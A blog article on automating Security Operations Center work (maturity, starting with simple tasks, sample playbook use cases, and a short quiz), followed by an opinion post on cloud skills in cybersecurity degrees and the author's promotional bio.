This article will discuss the maturity models of Security Operations Centers, how to know where your SOC is at, and how to embrace SOC automation and stay ahead of the curve. Automation within the Security Operations Center (SOC) is generally referred to as Security Automation and Orchestration (SAO) or Security Automation, Orchestration, and Response (SOAR). As an analyst, it has become increasingly more common to encounter some type of security automation within organizations. To what extent may depend on the maturity of your organization and its SOC. We will dive into maturity models and how those relate to automation a bit later in this article. First, what is security automation? What Is SOC Automation? No, SOC automation does not refer to robots becoming self-aware. Threat intelligence feeds do not suggest that “judgment day” is close on the horizon. Simply stated, automation is the machine implementation of low- level security-related actions. These actions are small pieces of a larger task. Generally, a task will be made from a number of actions. Similarly, a process will encompass a number of tasks. Tasks can be partially or fully automated with the goal of reducing human intervention in security operations. Orchestration, while very closely tied to automation, takes advantage of multiple automation tasks across multiple systems or platforms. Orchestration is used to automate or semiautomate more complex workflows and processes. We have heard criticism from SOC analysts and others in the security community regarding automation. The overwhelming theme seems to be that analysts are worried that automation will take their job. At first glance I can see where they are coming from. If a machine can do it faster and more efficiently, then what is the analyst to do? Believe me, I get it! As a SOC lead, I want to challenge my analysts to do a detailed analysis of events. This takes a good amount of time and is not possible with the volume of events seen on a daily basis. I want them to look for trends, examine data over a larger period of time, and then find the reason that these events are taking place. To ask themselves questions like: “Is the reason I have to respond to 50 events per day on an IPS signature due to the fact that the webserver is vulnerable?” Present that data back to your SOC leadership, and take initiative to get the business to patch the vulnerability. What we are attempting to convey is that SOC automation should not be seen as a limitation to your career, rather a springboard which can help you become a better analyst. We will go over a number of reasons for automation in the next section that should paint a clearer picture of the benefit of automation not only to the SOC but to the individual analysts as well. Let’s dig into why automation is a positive addition to any SOC. Why Automate? There are a number of reasons for a SOC to automate, but be assured that replacing analysts is generally not the goal. The SOC analyst is a valuable resource which will always be needed to perform where machines cannot. Whether part of a maturity initiative or new business requirements, leadership is often left taking on additional services with the same or fewer resources Taking into account that SOC leadership is being pressured to deliver more, combined with the shortage of skilled cybersecurity professionals, it is easy to see why automation is a no-brainer. I have spent time in the trenches working through an endless queue of events. When I was a junior analyst, there were times when I would have a number of events that were generated for antivirus detections where the files were quarantined. Over half of the events in that day were “potentially unwanted applications” (PUA) which were adware/toolbar related. The tool did its job, the files were quarantined, yet I still had a number of events that needed to be addressed. I had to manually add the appropriate notes and close each ticket. If I had automation in place, then it would have made my life a lot easier. I would have been able to focus on more in-depth analysis and look for a common source of the adware, but due to the sheer volume of events, it was not an option at that time. For me, automation is a force multiplier when it comes to helping analysts with the flood of events they handle on a daily basis. By eliminating the need for analysts to do monotonous tasks, they are free to spend more time performing higher-level analysis of events. Senior analysts will have more time to dedicate to training junior analysts and more time can be spent on developing documentation. With the ever- changing pace of a SOC, we all know this is always needed. One of the first reasons a SOC may choose to automate is to streamline existing processes. Many SOAR platforms have C-level dashboards that are designed to show the amount of time and money saved by automating actions. While I do agree to an extent that this can be important, focusing on this alone may not necessarily be the best fit for all organizations. There are a number of other reasons that I believe are equally important to the operation of a healthy SOC. One of my favorite reasons for automating is to reduce analyst fatigue. I cannot be the only analyst that has ever spent what seems like hours a day pressing “Ctrl+C” and “Ctrl+V.” I have gone home at the end of the day brain-fried, wondering if a monkey could do the job just as well. As I mentioned earlier, security analysts are the most important resource that a SOC has. These analysts are inundated day-in and day-out with an abundance of information that needs to be collected, categorized, classified, analyzed, and interpreted. Reducing the volume of events that need to be analyzed is one way to achieve this. Reducing analyst fatigue benefits the SOC by reducing overall stress and making it a fun and challenging place to work. Isn’t the saying: “Happy SOC, Happy Life”? Good leadership should strive to do all that they can to promote morale and a healthy workplace environment. Doing the same repetitive actions day-in and day-out will desensitize you and cause you to skip steps or cut corners. This fatigue increases the possibility for mistakes to be made. Reducing mistakes leads me to another popular reason for automating, which is standardizing processes. Analysts can get trapped in an endless screen-switching cycle during an investigation by checking documentation, following defined steps, and moving between multiple consoles. When automating security-related tasks, we drive consistency and reduce the likelihood for errors. Consistency is key in security operations. During incident response when we implement automation, we can ensure that processes are consistently followed. As a SOC analyst, it is very easy to cast wide nets in order to collect as much information as possible. Sometimes the rules we write just need to be broad. The events generated by a rule may only be an indicator when correlated to another event or other condition. Sure, you could write a correlation rule, but maybe you are in the infancy of tuning a rule, and thus analysts receive a large number of false-positive detections. What if we could use automation to tune out these false positives? Reducing the overall volume of false positives is one such use case that I have spent a good amount of time automating. I will give an example of this later in the article. Each analyst has their own preference for sources of information, and this can sometimes create false positives or lead an analyst down the wrong rabbit hole. As mentioned previously, consistency is important for a number of reasons, but in addition to those already mentioned, another reason to automate is for the reduction of information bias. There are some reputation and intelligence data sharing services that are higher fidelity than others. Open source feeds can be a double-edged sword. On one side they may have larger reference sets and are good quality, but on the other side, I have found that it is easier for one wrong attribution to skew a full dataset. When the sources for which data is ingested and consumed are defined by the team, reputation checking and intelligence enrichment can be easily automated within your playbooks. Every few months, it seems like there is a new attack pattern and threats are becoming more complex each and every day. Organizations need to be prepared for this evolution of complex threats. Adversaries today are utilizing automation to conduct attacks against your organization. Security operations need to keep up with the speed at which attackers are evolving, and the only way to do this is through automation and orchestration. As you implement new automation playbooks, the end goal should be to reduce the mean time to detection (MTTD) and mean time to response (MTTR). Each step that is automated shaves fractions of seconds from these SOC metrics. While at first glance it may not seem that a machine could save much time per single action, the culmination of all of these small actions over time will add up to significant time savings. The decrease of these metrics will satisfy senior management while also providing the numerous benefits mentioned previously. SOC Maturity I would like to preface this section by stating that I do not think many organizations would expect that they could fully automate every process from beginning to end. I believe there are just so many situations that require an analyst to make a decision that a machine just cannot do. There have been many horror stories of automation putting blocks in place based upon the wrong classification of the data. These instances have had catastrophic effects on businesses and their reputations. Until an organization has a high confidence level with the data being provided, I would personally suggest adding in some checks and balances into automation processes. These checks and balances should require human interaction and approval before blocking controls are put in place. All of these steps can be built into your playbooks to ensure that you can not only take advantage of automation to the fullest extent possible but also keep automation from taking an incorrect action. The goal of this article is not to go into a deep dive on the topic of maturity models. There are a few different ways to go about measuring the maturity of your SOC. You can write your own framework or use an industry standard framework to accomplish the same goal. The benefit to using a standardized framework is that it is recognized and probably being used by other organizations within your industry. Both solutions are designed to provide a situational summary of where the SOC is in their maturity taking into account all of its processes. Figure 1–1 Sample Maturity Phases When assessing the maturity of the SOC and its automation, it’s easy enough to start with a staged approach similar to the one shown in Figure . I put this graphic together to illustrate that once you have completed an inventory of the processes and actions that your SOC is doing today, you can then map your current state and measure your progress toward your goals. Set small goals to get you to the next phase. If you have not begun your automation journey, don’t be afraid of starting now. With each action you automate will get you closer to your goals. As a junior analyst, you will begin to see areas for improvement in the processes that you and your team use every day. Document any process gaps and look for actions that can be automated. Take time to gather all of the appropriate data, and do the analysis. Can any of these actions be automated? What benefit do you see it providing the team? Be able to articulate how you believe automating an action will improve the function. By presenting a process improvement or resolution to a problem and not just the gap, you will set yourself as a leader among your peers, and SOC leadership will see you as a true problem solver. How to Start Automating There is no one-size-fits-all solution for every organization. In my experience, it has been the most beneficial for analysts within the SOC that are intimately familiar with their processes and procedures to spend a little bit of time analyzing the work they perform each day. Categorize your tasks by the time required to complete them, and then by the complexity of the task. Start with the tasks that are simple, and do not take a lot of time to complete and leave the complex tasks for after you are comfortable with the process flow. Chances are that there are a number of these simple tasks, and by automating them you will make a good amount of progress. Figure may help you categorize your tasks and allow you to focus on automation tasks that will provide the most value up front. Figure 1–2 Security Task Categorization When starting with a simple task that takes a short time to complete, look for repetitive actions without complex conditions. If you have different actions that you take based upon the output of an action, it will add complexity to the playbook. I have found that it is very easy to start working through a use case, only to find out halfway through it that one small attribute changes the whole thing. Spend time dissecting the actions and whiteboard the process flow. Make every effort to break it down to the smallest steps that you can. A very simple example of automating a task such as this may be getting the reputation of a file. This might make it a bit easier to help you envision the steps taken. Figure 1–3 Simple use case of getting a file reputation In this simple example, I have broken down the task into four small actions that an analyst would need to take: 1. Gather the file hash. 2. Open a web browser. 3. Paste the hash into the browser and submit it. 4. Make a decision based upon the file reputation. The decision made upon the file reputation may then feed another action or a process flow further downstream. A playbook can be this small. Keep in mind that it is possible to have a playbook that calls other playbooks synchronously, waiting for the first one to complete before calling another. At first glance, it may not look like that by automating this task, you would save much time. What if the hash was a false-positive detection? What if we could automatically close the event based on the file reputation? What if we could collect the false-positive file and submit it back to the vendor to be reevaluated? Not only would automation help by eliminating the noise of false-positive detections, but it would reduce the number of tickets you would need to respond to. Now, this short, simple action has saved a significant amount of time when scaled to the number of events that need to be investigated in a day. Sample Use Cases I have come across a number of use cases discussed in different articles around the Web. Maybe some of them will work for you, or maybe they will just spark some ideas on what can be done. Like I mentioned earlier in this article, there is no one size fits all. Vendors supply sample playbooks that are generally meant as teaching points to what their product can do. Unfortunately, not every solution will be able to be integrated with your automation platform. You will encounter situations that may not work in your environment, just as you will also encounter situations that the vendor has not specifically encountered before. This is to be expected and is all a part of the journey of SOC automation. I wanted to highlight a couple use cases that I have personally encountered that I have had good success with. They do not cover every use case or reason that a SOC may choose to automate; however, they may act as a starting point or inspiration for your automation endeavors. A use case that I have encountered was reducing a number of false- positive detections from an email hygiene provider. The team utilized a service that sends alerts for a malicious email that was delivered. There were times that after the alert was sent, the email was reclassified as clean. I wrote an automation playbook that would call the email hygiene provider’s API to check for the “false-positive” flag. If the alert was a false positive, an analyst ticket would not be created. Another use case which was a bit more advanced was providing paging to on-call analysts when critical events came in. We started by defining the type of events that would cause an analyst to be paged out. Once that was complete, we began to figure out how to collect the on-call person and their page address. This took a bit of custom python code using a plug-in called “beautifulsoup.” The playbook would scrape an intranet page and parse out the email address to page and send an alert to that analyst with the context of the critical event. Once that step was complete, the playbook would monitor a mailbox for a read-receipt for the page. If the page was not acknowledged within an hour, the playbook would send the same page to the on-call escalation point. The most common automation use case that I have helped to put in place is the enrichment of events with threat intelligence. In this environment, events are sent from the SIEM to the automation platform for processing, and a ticket is created in a temporary ticket queue. The playbook will extract indicators such as file hash, file path, source and destination IP addresses, etc. Depending on the event type, these indicators are enriched from various sources that are predefined by the SOC. The data is used to populate notes in the event and add context to the event for the analyst that works it. Once all of this enrichment is complete, the playbook will move the ticket from the temporary queue to the SOC analyst queue. The reasons for moving it to the analyst queue after all the enrichment is done are to prevent a ticket state change and to ensure that any error checking added to the playbook is complete first. I want the analyst to have all the data they need to make a decision on the event, instead of having only partially complete data. Summary Security automation is a tool that assists your SOC analysts and allows them to be more effective with their work. In my opinion, it is not designed to be a replacement for an analyst. We invest in automation technology to make us more efficient at our jobs, and we are going to be required to make decisions where a machine cannot. I don’t want to focus directly on best practices for writing automation playbooks, but more of the overall process and how it relates to the SOC. With that in mind, I want to leave you with a few tips for success. If you have not already begun your automation journey, talk with your team about the benefits of security automation. Get everyone on board with the idea and comfortable with how you envision the playbooks working for the team: Do a full inventory of the tasks your SOC performs. Break them down by the time required, and complexity to complete them. Define your use cases before automating any actions. Focus initially on tasks that are simple and can be completed quickly. This will provide you with some quick wins. Don’t write long complicated playbooks. Break them down to specific tasks as much as possible. You can use a parent playbook to call multiple child playbooks. Don’t be afraid to challenge the status quo. When you start automating processes, you may discover a new and better way to do something. Embrace these efficiencies, and automation will show its value to your organization. While security automation may be in its infancy, there is much that can be done to improve the operations within your SOC. I hope I was able to provide some insight into why you need to begin automating sooner rather than later. I have highlighted a number of reasons for automating and provided some possible use cases for quick wins. Take the lead, and show the rest of your team that automation is not a limitation but a force multiplier that will help you all become better analysts. ARTICLE QUIZ (ANSWERS FOLLOW) _______ is the machine implementation of low-level security-related actions which are smaller pieces of a larger task. Ⓐ SOC Automation Ⓑ Process Ⓒ Orchestration Ⓓ Inventory _______ takes advantage of multiple automation tasks across multiple systems or platforms. Ⓐ Automation Ⓑ Process Ⓒ Orchestration Ⓓ Inventory A _______ is made up of a number of actions that are fully or partially automated while a _______ encompasses a number of the former. Ⓐ process, task Ⓑ task, process Ⓒ process, response Ⓓ response, task All the following are true regarding automation except: Ⓐ It will replace analysts in the next five years. Ⓑ It streamlines existing processes. Ⓒ It frees up analysts from monotonous tasks. Ⓓ It manages the flood of events coming in daily. All the following are reasons to implement SOC automation except: Ⓐ Reduce analyst fatigue Ⓑ Reduce mistakes Ⓒ Reduce productivity Ⓓ Reduce labor hours to increase skilled training Which of the following is true regarding how to start automating the Security Operations Center (SOC)? Ⓐ Start with complex changes Ⓑ Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks. Ⓒ Figure out who to fire first. Ⓓ Make tasks more complicated than they should be. All of the following are true about playbooks except: Ⓐ They can be small. Ⓑ They can call other playbooks synchronously. Ⓒ They’re only used in fantasy football. Ⓓ They should not cause incorrect or damaging actions. ARTICLE QUIZ SOLUTIONS _______ is the machine implementation of low-level security-related actions which are smaller pieces of a larger task. Ⓐ SOC Automation SOC Automation is the machine implementation of low-level security-related actions which are smaller pieces of a larger task. _______ takes advantage of multiple automation tasks across multiple systems or platforms. Ⓒ Orchestration Orchestration takes advantage of multiple automation tasks across multiple systems or platforms. A _______ is made up of a number of actions that are fully or partially automated while a _______ encompasses a number of the former. Ⓑ task, process Atask is made up of a number of actions that are fully or partially automated and a process encompasses a number of tasks. All the following are true regarding automation except: Ⓐ It will replace analysts in the next five years. Replacing analysts in the next five years is not entirely true. While SOC automation aims to reduce the amount of manual labor, SOC automation should be a springboard that frees up an analyst to work on more challenging tasks, preparing them to move out of the SOC into more advanced roles or to become a SOC Automation Engineer responsible for automating SOC Analyst tasks. Asmaller number of SOC analysts will always be needed to review the SOC automation’s work, assist in the SOC automation efforts, and handle exceptions. All the following are reasons to implement SOC automation except: Ⓒ Reduce productivity Reducing productivity is not a reason to implement SOC automation. Which of the following is true regarding how to start automating the Security Operations Center (SOC)? Ⓑ Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks. Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks. All of the following are true about playbooks except: Ⓒ They’re only used in fantasy football. There are many constructive uses for playbooks other than in fantasy football, including in SOC Automation. Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

If I was just graduating high school or deciding how to get started in cybersecurity, knowing what I know now, I wouldn’t ever consider a program that didn’t teach cloud skills (few of them do). By the time I would graduate, everything I learned would be obsolete. Within the next five years, most companies will have finished their migration to the cloud or at least close to it, or even just beginning on it; its the focus. This it Should Cybersecurity Degree Programs Have a Cloud Focus? Cloud skills are so difficult to teach because they change rapidly. Institutions have no way to keep their curriculum up to date. I have a cloud course and I’ve already had to go through and keep it updated. It changes so much that I put the year it was last updated in the title, just so that everyone knows its still relevant. Its super easy to update a course on a website or Udemy. Record a module and bam upload it. But updating a college course or program with students enrolled in it, that have all these accreditation requirements, has to be carefully planned and executed and by the time it all happens it needs to be updated again. If it doesn’t get easier to train for cloud skills, its perhaps the end of degree requirements for IT all together. Microsoft and AWS have the same problem. They need people trained on their platforms too and they know how difficult it is to do so they’re doing it themselves. I’ve taken some of the Microsoft Azure training and I liked it. It all works! That so hard to do. They keep it updated but the content is limited. Its not comprehensive by a long stretch. There are so many cloud fundamentals to learn that aren’t vendor specific that universities aren’t teaching. They could cover cloud fundamentals in one semester but they don’t. If you’re just starting out, I wouldn’t consider any program that didn’t teach you the cloud. And I mean it. Don’t do it. You’re probably going to get your degree and you’re not going to be able to find a job. Any program thats teaching you infrastructure or perimeter defense is obsolete by the time you graduate. It was a waste of your time and money (and you have to pay that back!) Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .